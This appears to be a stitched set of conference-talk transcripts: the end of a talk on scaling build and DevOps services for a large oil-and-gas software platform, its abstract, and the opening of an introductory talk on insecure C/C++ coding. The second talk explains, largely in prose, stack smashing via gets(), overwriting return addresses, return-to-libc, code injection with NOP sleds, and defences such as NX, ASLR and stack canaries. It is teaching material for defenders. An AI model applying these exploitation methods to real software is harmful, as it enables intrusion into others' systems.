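    order = TopologicalSorter(DEPS).static_order()
    return [m for m in order if m in dirty]

print(rebuild_plan({"modeling"}))  # ['modeling', 'simulation', 'platform']
```

Everything untouched by the change is skipped, which is one ingredient of the build-time reductions described later in the talk.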
But ultimately we wanted, from a technology side, an agile and intuitive traceable build system with minimal human intervention. And we wanted this to be a part of the culture, this whole notion of continuous delivery. So we divided it into incremental steps. Phase number one was all about predictability in the system. I'm not saying that the system wasn't predictable before we did this, but what I'm saying here was that the focus was on predictability in the system. So specifically on the technology side, for instance, we wanted server and desktop alignment. What that means is if the build error happened on the build server, it would be reproducible on your desktop as well. And it would be like, oh, it's only happening on the server. It doesn't happen for me, a.k.a. it's not my responsibility. So we had to invest in that. We also did a lot of investment in test automation. And in order to achieve this, we put aside a task force that really went after this. Phase number two, at that point, we had trust in the system. We wanted the predictability that we wanted, and we wanted efficiency out of the system. So from a technology perspective, build optimization. And from a process perspective, the investments that we made in the previous phase on test automation, we wanted to preserve those. So we created a sort of a guideline that we named Keep It Green. This was a rule set of, I think it was like between five and ten rules that basically everybody had to follow. We printed those on flyers. We went all through the organization to basically protect that investment that we did in the previous phase. We also, in order to support this initiative, we also created something we called Build Buddies. So these would be looking after builds that sort of fell in between the cracks of the system, even though people were supposed to take ownership. There might have been still unpredictable things in the system that basically they took care of and communicated back to the DevOps team. So phase two was about efficiency, getting speed. Phase three was about effectiveness. Even though in efficiency, even though you do something fast, it doesn't necessarily mean that you do the right thing. So in phase three, we, from a technology perspective, we focused on trying to share these binaries that we had already built in the server park with the developers so that it didn't have to build them locally. The gates that we had invested in in phase one and sort of retained in phase two, we wanted to automate them and have automated gated check-ins in phase three. And last but not least, from an organizational perspective, we created something that we labeled the Build Federation. Build Federation would basically be the DevOps team being a central team that is responsible for the rules, for the entry into the server park, and sort of the nuts and bolts of the system. And then we would have deputies with the mandates to make build decisions out in the different teams. So that was also one effort that was put in place in order to make the system scale. Okay, so in this slide, I've made them into, it looks like maybe it's almost like three separate phases. Many of these phases had elements of phases above and beyond, or above and below them. So if you go around the organization, I'm not so sure if you'll find these sharp lines in between phase one and phase two and phase three. But from an overall perspective, this was basically how we broke the challenge down into incremental steps. 
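As a small illustration of the "Keep It Green" and Build Buddy ideas, a sketch of a triage script that scans the latest build results and tells each build buddy which red builds to chase. The data format, team names and buddy assignments are all hypothetical.

```python
from collections import defaultdict

# Hypothetical snapshot of the latest CI results, one entry per build configuration.
LATEST_BUILDS = [
    {"config": "core-integration", "team": "core", "status": "green"},
    {"config": "seismic-nightly", "team": "seismic", "status": "red"},
    {"config": "installer-daily", "team": None, "status": "red"},  # no clear owner
]

BUILD_BUDDIES = {"core": "Anna", "seismic": "Jon", None: "build-services-on-duty"}

def triage(builds):
    todo = defaultdict(list)
    for build in builds:
        if build["status"] != "green":
            buddy = BUILD_BUDDIES.get(build["team"], "build-services-on-duty")
            todo[buddy].append(build["config"])
    return dict(todo)

for buddy, configs in triage(LATEST_BUILDS).items():
    print(f"{buddy}: please keep it green -> {', '.join(configs)}")
```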
All right, so a little bit more on phase one then, quality gates. There's been lots of talks about TDD and testing and how to do it and how not to do it, even the previous presenter here had some thoughts on that. This is more about how you actually do it from an operational perspective. You've probably seen this pyramid before. You have a thick layer of unit tests that are cheap to run, really fast, easy to develop, don't really need that much mocked environment. Maybe it doesn't even need data and stuff like that, and you create lots of them because they're cheap. Second layer is you have modules, then it's testing the module by itself, maybe via an extensibility interface. Maybe you start merging modules and you mock a little bit around, pull in some data, start twisting and turning these modules into stressful environments. That's layer number two. Layer number three is, not necessarily with the user interface, but at this point you bring up the application, you run through some workflows. So again, I have to emphasize that the platform is very integrated. This is very important for us to run workflows because the module tests in isolation might all be green, but when you put them together, they're not necessarily green because the interfaces are wrong, or they're not passing over the correct data or syntax and so on and so forth. The last layer is, I call it UI. So there are many frameworks to be able to support UI. The focus in our organization was at this level, the competency and the organizational responsibility switched. It switched from the developers to the quality assurance guys, to the testers, and they are typically domain experts. So they know all this oily stuff that the developers might not necessarily have deep knowledge of. So they twist and turn the software by using UI tests and also then testing the top layer of the system. Alright, so then when we invested in this testing architecture and defined these quality gates, we also wanted a metric to ensure that we're on the right track here. So one way of measuring that is to measure the number of tests that you have in the system. That in itself may not necessarily produce that much value. So we also decided to track code coverage because that meant that we were adding value to these new tests. They were creating a different footprint that the previous tests were not necessarily giving. You might also argue that that in itself is also not really a good KPI or a metric to support the quality of your quality gates. What I didn't put in here was that the number of defects at the client's site, which I guess would be the ultimate way of measuring these quality gates, also went down. So we knew that we were doing something right. We had some metrics to try to capture our goals and we put that in place and then we monitored that. So basically in summary, the investments in automated testing was about agreeing on the quality gates and agreeing on the test architecture. And the DevOps team ensured that whatever they were doing in these even remote places away from Norway produced, we were able to reproduce in the servers. And then also we put aside a governance plan to protect this investment that we made. And I mentioned KPI Green was one of the efforts. So that was phase one, predictability and quality gates. Phase two, I said, was making the bills more efficient. So very simply said, it was from going from a monolithic model with sort of a big gate at the end of it, maybe even manual, to a modular. 
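Before the modular-build story continues, a quick sketch of how the pyramid above can be enforced as an automated check-in gate: cheapest tier first, fail fast, and a coverage threshold so the test investment is protected. It assumes pytest with the pytest-cov plugin and markers named "module" and "workflow", which are my inventions, not the project's real setup.

```python
import subprocess
import sys

# Run the cheap, numerous tests first so feedback stays fast; stop at the first red tier.
GATES = [
    ["pytest", "tests/unit", "--cov=myplatform", "--cov-fail-under=80", "-q"],
    ["pytest", "-m", "module", "-q"],
    ["pytest", "-m", "workflow", "-q"],
]

def run_gates() -> int:
    for gate in GATES:
        print("gate:", " ".join(gate))
        if subprocess.run(gate).returncode != 0:
            print("gate failed: check-in rejected")
            return 1
    print("all gates green: check-in accepted")
    return 0

if __name__ == "__main__":
    sys.exit(run_gates())
```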
What I haven't modeled into this picture, to sort of spare you my drawing skills, was the interdependency between all these modules. But the idea was basically to have quality gates at the end of each module and also as they were integrated up in the system. The metric that we used for this is quite simple. It was the time that it took to build the system. And as you can see here, and I put this in here on purpose because this was sort of working on moving parts, because as we were going through this transition, we were also growing the platform. So you see the lines of code were actually going through the roof as we were actually decreasing the build time. So it's almost like an oxymoron. But that was the achievement. And in summary, the build optimization, we looked at everything all the way from compilers to modularization of the system. A very good system for dependency management, algorithms that could spin through the whole system and compute the dependencies online and only rebuild what was necessary. And this goes beyond what Visual Studio can do and also tools like IncrediBuild and stuff like that. Concurrency was also a big focus on our side. And then we got incremental builds. So we basically went from hours, hours and hours. I can't really say exact numbers, but let's just say hours and hours down to minutes while we were growing this platform. In phase three, we had a fast build, but we wanted to make it more effective. We wanted to do the right things at the right time and so on and so forth. So I put this picture in here just to remind you that it was a globally distributed development team. So it's basically spread around all the way from Houston to Beijing with the DevOps team sitting in Oslo and the local data center as well. So to make the builds more effective, on one side we focused on hardware. And we looked at our server utilization, and this is not necessarily load balancing within the continuous integration tool, because it does that fairly well by itself out of the box. But this was more to look at what the developers in Houston need when they get up in the morning, as opposed to when we in Europe leave for the day, as opposed to what sort of nightly builds the Asia part of the organization needs. So this was really looking at the schedule overall, both from a deep technical perspective all the way down to the metal, but also from an organizational perspective. So as you can see in this graph here, we were able to get these loads that were swinging. So basically we had parts of the day where we had huge build queues and people were waiting on these fast builds. They were really fast, but there was still, because we hadn't scheduled them optimally, then people were still waiting. So we were able to get that variance down and got into a good steady state load on the servers. And as you can see here, we didn't really increase the server park that much. So only a marginal increase of the server park. So it wasn't that big of a capex investment. Then, sort of on the software side: we're getting more builds of the system, we're building them right, we're building them fast, we're building them at the right time. But the DevOps team is still sitting in Oslo covering all these time zones. So we put a big focus on load balancing from an organizational perspective as well. And that basically means training.
So we trained these deputies that were sitting locally to all these different teams to understand the system and to understand how the internal configurations of the system actually worked. So that they could self-service themselves, or that they could service themselves out of our business hours. So you see that the training time that was needed went down while we were actually getting more and more developers in the system. So again, we were scaling very well with this organizational model. Since summary, we were load balancing, leveraging hardware and people. One thing that I didn't mention was that we also put a big focus on backup management of the DevOps team itself and made it visible to the other teams. Did reviews so that a selected number of people, the deputies that is, would understand what was in our pipeline coming up, both on schedules and improvements. And we put a big emphasis on making the reports intuitive. So when you look at the report, you didn't have to pick up the phone or send us an email because it was clearly written in the bill log, what was wrong with your submit. On the documentation side, we made a conscious decision to have that crowdsourced, although it was refereed. So basically anybody could contribute to the documentation, but it would be refereed by the bill team. And last, as I said also, build scheduling was really starting the right builds at the right time. All right, so the last aspect that I was going to bring up in this transformation goes across all the phases, and that was making the DevOps team itself more effective. What you're seeing here on the screen is basically the work steps of one of the workflows that the DevOps team has as its, or her job. You basically receive the code, you compile it, you unit test it, you distribute the module, integrate it, you integrate, and you do some regression tests on that integration, and then you distribute it. So those are basically the work steps. On the different contexts or devices that you're in, in these different work steps, it might be in the code repository, an allocated service space, maybe a continuous integration software repository, or on a network share. This is just an example. So as you walk through one of these work steps, you can also highlight areas where maybe you spend more time than you either are told it should take, or that you think is taken too long because of low hanging fruit, or because of the technology itself should perform better than that. So basically, you walk through a number of work steps like this. Second thing is, we took a look at what is the nature of these work steps, what is the volume of it, what are the varieties in these work steps coming in, what sort of skillset is required, and what sort of flexibility is needed by the people that actually give these work steps or these requirements to us, and how do we utilize the assets. So the assets is both on the hardware and on people. So then you end up with maybe some more project, one of a kind sort of thing where you integrate a huge module that you're only going to do once or maybe once every year. Certain things are more of a batch nature, whereas other are clearly continuous flow and they should be automated. So you basically go through the work step and you find areas that you go through like this, and then you implement continuous improvement actions accordingly after you've gone through this. Alright, so then we're actually at the end of the slide set. 
So to summarize, like I said in introduction, we increased the responsiveness quality while we were growing the platform footprint, and with the KPIs that I mentioned, responsiveness to customer, and also quality overall. So how was this achieved? I would say then to summarize, it's because of the culture of continuous improvement in the organization, sort of triggered this whole investment, and throughout both the backbone in the organization, but also while we were learning doing all these continuous improvements, we acquired this excellence in change management. As I mentioned before, we did lots of things, incremental things within technology, within process, within organization, and we did this all while we were sort of flying the airplane. So we're fixing the airplane while we were flying it. So very good risk plans and change management plans. Also, another area that I would like to highlight that I think is important in this achievement story is the continuous effort of attention on architecture. So this is both on the build architecture that basically follows the software architecture of the product itself. So you have the product itself, build architecture, and test architecture, and all these three follow each other through this attention on architecture in the system. And all this investment that we're making, we're continuously monitoring through our metrics that we decide on, and sometimes we bring out old metrics and bring in new, but some of the bigger ones, like for instance, the percentage of daily builds is still there as one of the major metrics. But this notion of continuous improvement and continuous monitoring is very important for this culture of continuous improvement because the continuous monitoring basically drives our backlog and both in prioritization and in sort of a roadmap perspective. So that was it. Any questions? Yeah. Yeah. Yeah. Yeah. So that's a good question. So the question, I'm not sure if everybody heard, the question was, this is, I think you said something else, but I understood it as this is sort of a simplified version of everything. If I were to do it again, would I do the same thing again? I would probably do a few things different, but would they, the things that I would have done differently, would they have made things go faster, would they have been more effective and so on and so forth? I'm not so sure. So I think the answer to the question is actually no, I'm not so sure if I would do so many things different. But I have to highlight here that this continues improvement. I mean, everything was broken down. We had a backlog that was prioritized just like any other scrum processes. So we ran this actually as a scrum process. If we saw that, we started the project and we said, we want to go this way. We think it's this way here. We were very agile and we were able to move very, very quickly. We could change our backlog within weeks and we could do different things. We also tried to isolate the test. Maybe that's one area that we could have improved on all the way from the very start, defined the isolated tasks that could be done by somebody else because then you can hire a consultant and you can ramp up the effort and get things faster, get things done faster. So that's one effort. But in general, being agile in the DevOps team, so basically practice scrum within the DevOps team, I think this may be a little different from what IT people think. This is my impression anyway. So I didn't hear... Yeah, okay. 
So the question is about the ratio between the DevOps team and the developers. So I'm not sure if I can disclose all those numbers, but it's a handful of... The DevOps team is a handful of people and the number of developers is hundreds. So that's sort of the ratio. Then you get a feel for the ratio. And I have to say that the headcount of the DevOps team has stayed the same, whereas the number of developers has multiplied many times over. Yep. Any other questions? Okay. Then I say thank you very much and enjoy the holiday weekend.
|
Developing a multi-million LOC highly integrated software product across several locations in numerous time-zones introduces multi-dimensional challenges for the developer operation. Ensuring a frequently available build, configuring and parameterizing tools effectively and efficiently, and guaranteeing that the right content is included for the right release are the top three challenges. Furthermore, to optimize the operation, a reliable and deterministic development environment as well as a lean release coordination structure must be in place. This can be obtained by designing a development operation (DevOps) with a focus on self-service and automation, coupled with tight integration with the developers to continuously optimize the flow of features through the build system to the final artifact delivered to the customer. The Petrel Build Services group is a development operation (DevOps) team offering a range of services for the Petrel E&P software platform. Automated builds, a scalable test and debug environment, tool stack support, code diagnostics, and daily installers are key deliverables. In less than 10 years, the size of the organization being supported by the Build Services group has grown from a team of 10 to hundreds of developers. This has been achieved by maintaining a flat headcount in the group.
|
10.5446/50854 (DOI)
|
in 20 now. So welcome to this session about insecure coding in C and C++. First of all, I have to make a small disclaimer because it's not that much C++ here. Everything I'm talking about is also relevant for C++. But there are few or actually nothing that is specific for C++ per se. And that's quite typical when you walk down in the stack and close to the hardware. The other thing is that I kind of promised lots of assembler. But when I compare it to a few other talks that I've done, for example, test driven development in assembler. And another talk I did last year, where 90-minute talk where I think 60, 70% of the slides were in assembler. I have to admit it's not a lot of assembler, but it's enough. So some assembler in this talk. But perhaps more important in the program, it's impossible to see what kind of level talks are at because it's not written in the program. And when I sent in this proposal, I deliberately set it to introduction and a general kind of overview of how to do insecure coding in C and C++. So if there are any deep experts in hacking programs on machine code level, you might be disappointed. It's not an expert talk. It's not even advanced. It is a general introduction to a lot of concepts that are useful to know, both if you want to write insecure code, but also if you want to write secure code. So it's an introduction talk. But just checking, is there any kind of hackers in the room that really know this stuff? Okay. Just anyone that know about cold injection? Yeah. A few people. Anyone that have done it in the last 10 years, because everybody did it when they were kids, but in the last 10 years? Okay. Not so many. But that's good because then it's nice to have this introduction level. So being stupid is a privilege to some extent. But you can also do dumb things intentionally. And you have to admit that these guys, these guys, they do actually know a few things in order to do so many stupid things that they do. And I hope this talk will also focus on knowledge-based ways of doing stupid things in C++. So there is nothing special with my machine when I'm referring to it. Apart from it's just a 32-bit Linux kernel, fairly recent, with a fairly recent compiler, and a fairly recent Ubuntu distro. I wrote the main of this talk in March. So if I wrote the main of this talk now, I would have just upgraded it. But it's nothing special in there. So that's not where to look for faults, etc. This is something that you can do on all types of machines and operating systems and compilers that you find out there. So in this talk, I will briefly discuss the following topics, StackBuffer overflow, also called Stack Smashing. How the call stack and activation frame is working. I just have to go through that, even if most people have a reasonable understanding of how it's working. Well, most C programs have a reasonable understanding of how it's working. I need to go through it because I will refer to a few of those things later when I explain how to write exploits, how to do arc injection, code injection, how a few protection mechanisms are working. There is some feedback in the audio. I'm getting some feedback in the audio. Okay, it's probably good. And then some protection mechanisms like ASLR, StackCanaries, and a fancy mechanism called return-oriented programming. Who knows about return-oriented programming? Okay, three, four people who have not only heard about it, but actually read about it and studied it a bit. Nobody, good. Because I don't know very much about it. 
I wasn't sure if I was going to include it because while I think I understand it, I don't understand it well enough to explain it really well. So I've just done a very brief explanation of return-oriented programming. Then I'll show some things about how to write code with surprising behavior. Talk about layered security, information leakage, how to patch binaries, and in the end I will do a summary where I summarize a few tricks for writing insecure code. All of this in 60 minutes, or actually 55. So we better get started. But now we understand it's an overview. It's not going deep into anything really. But take a look at this code first. It's a small program. Of course, it's a contrived example. I'm using it just to illustrate a few other concepts. So I had to make some stupid stuff in there. And of course, the key thing here is the use of gets and the buffer, the response buffer. That is what we're going to have fun with. And I guess we all know that gets is a function that you should never use. And it has been removed from the language now. But it's still a nice function to have there when you want to kind of explain in a simple way how stack smashing can be done. There are so many other ways you can do it. So don't be confused by me using gets in this example because there are hundreds of other ways you can do exactly the same thing. Yeah. Of course, it doesn't use gets and that's good because it has been removed from the language. But for now, we are going to use it. Let's see what happens when you try to execute this code. So it was supposed to work like this. When you run the program, it's asking you for a secret. And if you type in your name, which name should I type in? Anyone remember the movie? Oh, you're close. But the hacker was named David. So you try with David first. And David is not the keyword. So access is denied. And the operation completes. Nothing has happened. Okay. So that was how it was supposed to work if you type the wrong secret. But if you went into it and typed the right secret, Joshua, the name of the professor, then access was granted to the system and two missiles were launched. Operation complete. And now we are going to look at kind of the simplest way of exploiting this, because if we type in a very long string, bad things will happen. And in this particular case, on my machine, I got access granted, even though the strcmp didn't match. And it was launching a few missiles. And operation was complete. Did anyone see something strange here? Yeah. We got both access granted and access denied at the same time. So not only have we kind of launched how many millions of missiles, but we have also seemed to mess up the program in such a way that it becomes unstable and seems to both pick this path and this path at the same time. Now, for those of you who have seen some of my previous talks last year, you might remember why it is like that. I will come back to it and explain it. But first of all, I will look at this one. Why did we get so many missiles? And in order to understand, to kind of explain that phenomenon, we need to understand how the stack is working and what is happening when the program is executing. So due to an overflow, what has happened is that we have messed up, changed the value of allow access and we have changed the number of missiles. And this is the strange thing that we will look at later. So what we just saw now is what is typically called Stack Buffer Overflow and sometimes Stack Smashing.
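The code on the slide is not reproduced in the transcript, but a program with the same shape — a small response buffer read with gets, sitting next to an access flag and a missile counter — might look roughly like this. The variable names and the buffer size are guesses based on how the speaker refers to them:

```c
/* Minimal sketch of the kind of program being discussed, NOT the speaker's
 * actual slide code. gets() has no idea how big the buffer is, so a long
 * input overruns response[] and clobbers the neighbouring variables.
 * (gets() was removed in C11 precisely because of this, so expect at least
 * a warning with a current compiler.) */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

static void authenticate_and_launch(void)
{
    bool allow_access = false;
    int  num_missiles = 2;
    char response[8];                 /* the size is a guess */

    printf("Secret: ");
    gets(response);                   /* unbounded write -- the whole point */

    if (strcmp(response, "Joshua") == 0)
        allow_access = true;

    if (allow_access) {
        puts("Access granted");
        printf("Launching %d missiles\n", num_missiles);
    }
    if (!allow_access)                /* two separate tests, as in the talk */
        puts("Access denied");
}

int main(void)
{
    authenticate_and_launch();
    puts("Operation complete");
    return 0;
}
```

With an input longer than the buffer, the extra bytes land in the missile counter, the access flag and eventually the saved frame pointer and return address, which is what the rest of the walkthrough exploits.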
There was a famous paper that came out in the 90s called Smashing the Stack for Fun and Profit. That in some way changed the computer industry, because suddenly a lot of attention came to this point that we need to kind of write bug-free code and certainly not allow stack buffer overflows, because there are so many things you can do. And while it is common to hear C and C++ programmers discuss with each other and say, oh, this is a stack variable and this is on the stack and there is a call stack and activation frame, etc., it is important to know that the standard never says anything about the stack. So although it is very common for a C program or C++ program to actually use a call stack and activation frames when executing, this is not something that is mandated by the standard. So if the compiler or the optimizer can create a similar behavior without using a stack, it is allowed to do so. So this depends very much on the optimization level. But from a conceptual point of view, it is reasonable to think about an execution stack that works approximately like I am just going to describe now. And note, while I have been doing this on Linux on an Intel CPU, this is approximately the same way all typical CPUs are working. So what happens here when we start the program is that the operating system is loading the program into memory and then it is passing control to usually something called start, which is often in a C runtime library. And inside of start, it is not doing very much. It is setting up the call stack, maybe initializing some variables, preparing for dynamic memory allocation, etc. But very soon it will jump into main. And once inside of main, it will start executing the assembly instructions that are a representation of this code. So the call stack has been set up before we enter main. And it is useful to draw it like this, with the high addresses at the bottom and the low addresses on top, because nearly all call stacks grow from high addresses up towards low addresses. So if you try to draw it the other way around, it is difficult to reason about it, at least sometimes. So the first thing that happens when it is jumping into main is that start, the runtime start library, has pushed the return address, kind of the next instruction that is supposed to be executed when main is finished. So this is coming in here: the return address, the next instruction in start. And once inside of main, main will then set up its own activation frame by putting a pointer to the previous stack frame there so that it can be restored. And now it has its own activation frame that it can use. So when it is supposed to execute puts, it will first put a pointer to the string onto the stack, and then the return address, the next instruction in main that should be executed, which is this one. And then it will make the jump into puts, which can do whatever it wants. But it is usually just building another activation frame and behaving like the others, though it doesn't have to do that. And when puts is finished, these things go away, kind of like garbage collection, not in use anymore. And before calling authenticate and launch, the same procedure happens again. We push the return address of the next instruction, which is here. And then it jumps into authenticate and launch. And then it saves the pointer to the previous stack frame. And then it allocates space for these local variables.
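None of this layout is guaranteed by the standard, but you can observe the typical downward growth on a conventional implementation with a tiny experiment like this one (purely illustrative; the output is whatever your platform happens to do):

```c
/* Observing -- not relying on -- typical stack behaviour: on most
 * implementations the addresses of locals in nested calls decrease, because
 * the call stack grows towards lower addresses. None of this is guaranteed. */
#include <stdio.h>

static void level(int depth)
{
    int local = depth;
    printf("depth %d: &local = %p\n", depth, (void *)&local);
    if (depth < 3)
        level(depth + 1);
}

int main(void)
{
    level(0);
    return 0;
}
```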
And local variables or stack variables is not a very exact name. So if you are wondering how this is working and you use those inexact names, you typically end up in discussions between people that are not necessarily experts in the topic. So if you really want to go to the places where they discuss how this is really working, you should talk about variables or objects with automatic storage duration, because that is the wording that is used in the standard. And it's in some way a much better term because it doesn't indicate that this is going on the stack. But now you see we have put stuff here: allow access, the missile counter and the response buffer. Anyone see something that might be a bit strange there? The order? Yeah. So, I'm not trying to pick on you there, but thanks for playing. It's very common for programmers to believe that they have a correct idea about how things are laid out on the stack. But there is no reason why programmers should be able to reason about that, because as soon as you increase the optimization level, for example, things will be rearranged. Some things will be stored in registers, some things will never actually get a physical memory location, or whatever. And this kind of rearranging of the order is very typical for all compilers. They do that all the time. So there is no correct order in this particular case. But this is what happened, exactly this happened, on my machine when I was executing it. And then we go into print. We just follow the same thing: a pointer to the string, save the return address, save the previous stack frame, print it, and then we get into gets, which is the culprit here. Now, the reason why we get this problem is, of course, that gets doesn't have any idea about how many characters it's allowed to write. So depending on how many you are writing, it's just going to continue poking stuff into memory. And any input of eight characters or more will cause a problem. And this is exactly the stack data that I got when I executed this on my machine. And most of this stack is basically just padding to make sure that things are aligned properly in memory. So it doesn't really matter what kind of values are there. But we recognize, with some training at least — you look at the stack frame and the stack data and you start recognizing that this is the return address, this is the pointer to the stack frame, this is allow access, the missile counter, and the pointer to the response buffer. So focusing on the stack variables, this is what happened when I typed in global thermonuclear war. Okay. And now we partly have an explanation for why we got — how much is it? — over a billion missiles, because this number is 1.8 billion. But we are also close to seeing why this happened: access granted and access denied. And it's because of this one, the 6c here. And the first time I saw this, I was kind of surprised. That was, I think, two years ago, when GCC 4.7.1 came out. It was the first time I saw this particular issue. But I studied the assembler code. It was blogged by Mark Schroyer first, and I continued in his direction and I studied the assembler code. And what I saw was that GCC, my compiler in this particular case, basically said that a bool is always either zero or one and never anything else internally in memory. So if someone messes up so that it's neither zero nor one, you get this behavior. This is sort of the assembler expressed as C code. Because when you read the assembler, you see that in order to decide whether you should do access granted or not, it basically says: is allow access not zero? Then I'm going to grant access.
And the next thing in the assembler code is that if allow access is not one, then I'm going to deny access. And if for some reason allow access becomes anything but zero or one, you get this kind of quantum behavior in your code. And this is not limited to bool. This happens all the time when you mess up the internal data structures inside of your program. So by allowing, in some way, memory overwrites, you can also get this very, very strange and surprising behavior like this. So going back to our understanding of how the stack is working on my particular machine, we also see that now we can write a small script using the printf Unix command, where we basically just send in eight characters, because we don't care anyway, and then we type in 2a — hex for 42 — and put that into the missile counter, and then we put in one to allow ourselves access. And that gives us launching 42 missiles and operation complete. And now we have a way of controlling the program. But using scripts like this is not a very effective way of exploiting. So it's perhaps more common to see exploits written in C or Python, for example, that are, in this case, building up a structure that is exactly the same as the stack on that particular machine. And now we can programmatically say, I want allow access to be true, I want the number of missiles to be 42. And then I'm just writing this into the place where I can kind of put the payload — or this is not really a payload, but where I can put the data — and really control how the program is working. Yeah. So now we see we have a programmatic way to do it. But perhaps we also see a new opportunity now. What about this one? This was the return address. This is the place where it's supposed to jump when it's finished with the function. Hmm. What would happen now if we write an exploit more like this? We increase our struct because we're going to map a bigger part of the stack on the target. So we still allow access. We launch three missiles. But now we are also poking in the particular address for where this function is supposed to return. So we are saying: I don't want you to necessarily go to the puts of operation complete when you're finished. I want you to do something else. And in this case, this particular address happened to be pointing to the beginning of authenticate and launch again. And now I have changed the execution path of the program in such a way that it's basically launching more and more missiles, and just for fun I'm increasing the number of missiles every time. So four, five, six, seven, eight, nine missiles should be launched. And this is called arc injection. It's not very often used like this, going back to your own function. What it's typically more used for is to jump into one of the library routines. So, for example, first you push the address of a string that you have poked into memory somewhere, and then you change the return address and jump into a libc function, for example system. And suddenly you can invoke Unix commands inside of the program. And that's the reason why arc injection is often called return to libc, because that's where it's mostly used, to jump into libc. Any questions around that? Yeah? No? Feel free to stop me during the talk. So now we have looked at arc injection and return to libc, which is a very common way of exploiting a program.
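The exploit source itself is not in the transcript; a heavily simplified sketch of the kind of C exploit generator being described might look like this. The struct layout, sizes, padding and addresses are all invented for illustration — a real payload has to match the exact frame layout of the target binary on the target machine:

```c
/* Illustration only: generate a payload that mirrors one assumed stack
 * layout of the vulnerable function. Field order, sizes and the addresses
 * are made up; a real exploit is built from the target's disassembly. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

struct stack_image {
    char     response[8];      /* the overflowed buffer                  */
    int32_t  num_missiles;     /* neighbouring locals get overwritten    */
    int32_t  allow_access;
    uint32_t saved_frame_ptr;  /* saved EBP on a 32-bit target (assumed) */
    uint32_t return_address;   /* where the function will "return" to    */
};

int main(void)
{
    struct stack_image payload;

    memset(&payload, 'A', sizeof payload);        /* filler               */
    payload.num_missiles    = 42;
    payload.allow_access    = 1;
    payload.saved_frame_ptr = 0xbffff000u;        /* fictitious address   */
    payload.return_address  = 0x080484d0u;        /* e.g. the start of the
                                                     vulnerable function,
                                                     or a libc routine for
                                                     a return-to-libc jump */

    fwrite(&payload, sizeof payload, 1, stdout);  /* pipe into the target */
    return 0;
}
```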
But we are not limited to that, because we can also let the compiler generate, for example, the machine code values for a small program that we can put on the stack. And in this case, I've just written a small function and compiled it with gcc, and I already get all the hex values that I need, so that now I can take this, create a string with these hex values, write it onto the stack, and jump to that location in memory and start executing code. So this is what is called code injection: you inject some code first and then you jump to that code. Sometimes it's difficult to kind of calculate exactly where you should start. So it's very common to use a NOP sled, where you have thousands and thousands of no-operation NOPs first, so that it doesn't really matter where you are hitting, because you will hit somewhere and then the execution will just do no, no, no, no, no, no, and then suddenly execute your code. And that's what is called a NOP sled. So can I demonstrate code injection? Well, it used to be very easy to do so back in the old days. And that's the reason why I said in the last 10 years, because while it was easy to do it on the Commodore 64 and the early 8080 machines, etc., early PCs, for the last 10 years there has been this annoying data execution prevention mechanism which is using a write-xor-execute strategy, sometimes called an NX bit, where it basically says that when a program or operating system is asking for a page of memory, it has to say: is this going to be data or is it going to be executable code? And it cannot be both. And this mechanism is very effective at preventing the possibility of executing code that is stored in a data segment and not in a code segment or a code page. So, but it's not the only protection mechanism out there that is useful to know about. There are plenty of them, but they are often easy to turn off. And one of them is called address space layout randomization. And it also became common on major operating systems, I'm not sure, five, six, seven years ago. So now all the regular operating systems tend to implement it. And that basically says that before, we had the situation where when you execute the program, it tends to always go into the same place in memory. All the addresses were the same. So the stack was at the same place, the globals and the functions were at approximately the same place, and also the library routines were at the same place. But with ASLR enabled, every time the operating system is loading a program into memory, it tends to put things in different places. So it becomes slightly more difficult to guess where things are in memory. So it's more difficult to kind of jump into a particular function, etc. Now, this is considered to be a very kind of minor obstacle, because there are so many ways you can do information leakage. You can first get the information of where things are stored in memory and then you can calculate exactly where it needs to be. So while it's slightly annoying, it's not considered to be a very, very strong mechanism. And also, in order for ASLR to work, you need to have compiled with position independent code and position independent executables. And this is not on by default in typical compilers. So you have to explicitly say, I want position independent code, for ASLR to work. And often, people are not willing to pay that 10%, well, 10-ish percent, extra price of having position independent code. So, but there are many ways of disabling it.
You can even poke stuff into your kernel where you basically say, no, I don't want ASLR anymore. You can boot up your machine without ASLR. And of course, you can make sure that your code is not position independent. Here is another mechanism, which is often called Stack Protector. And that one is injecting a so-called stack canary. Here is the stack canary. So the body of the function is the same, but in the preamble, just before executing the body, it's poking a supposed-to-be-random value into a memory location and XORing that one. And then when it's exiting the function, it's checking: has this canary died, has it changed? And if it's changed, then the program is just going to terminate. So at least it doesn't continue in an invalid state. And this is enabled by doing -fstack-protector, which is often default on modern compilers, because this is not a very costly operation, because the stack canary only comes into functions that actually do have a potential for buffer overflows. So it's not a cost you have to pay for every function. But not only does it put in this magic value, it also often moves around the variables. So in this case, the response buffer is at a higher address than it was before. And that is nice, because it means that if you are overwriting it, it's difficult to change allow access and the missile counter. And this is a deliberate strategy that they are using, putting the vulnerable buffer at a high address. And some people have actually suggested that we can solve all the security issues if we start making our execution stack grow up instead of down. I never understood that proposal, and it seems like it's not a very popular suggestion out there, but it's an interesting thought that the position of your stack variables depends on how easy it is to exploit the program.
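Going back to the stack protector for a moment: the canary is emitted by the compiler in the function prologue and epilogue, but conceptually the instrumented function behaves roughly like this hand-written sketch (the guard variable and the failure message here are stand-ins, not the real implementation):

```c
/* Rough, hand-written rendering of what -fstack-protector arranges for.
 * In reality the canary value, where it lives and the failure handler are
 * implementation details of the compiler and the C runtime. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static unsigned long stack_guard = 0xdeadbeefUL;  /* stand-in for the real,
                                                     randomized canary      */

static void protected_function(const char *input)
{
    unsigned long canary = stack_guard;   /* prologue: canary placed between
                                             the locals and the saved frame */
    char buffer[16];

    strcpy(buffer, input);                /* the potentially overflowing body */

    if (canary != stack_guard) {          /* epilogue: has the canary died?  */
        fputs("*** stack smashing detected ***\n", stderr);
        abort();                          /* terminate rather than return
                                             through a corrupted frame       */
    }
}

int main(void)
{
    protected_function("hello");          /* harmless input: canary survives */
    return 0;
}
```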
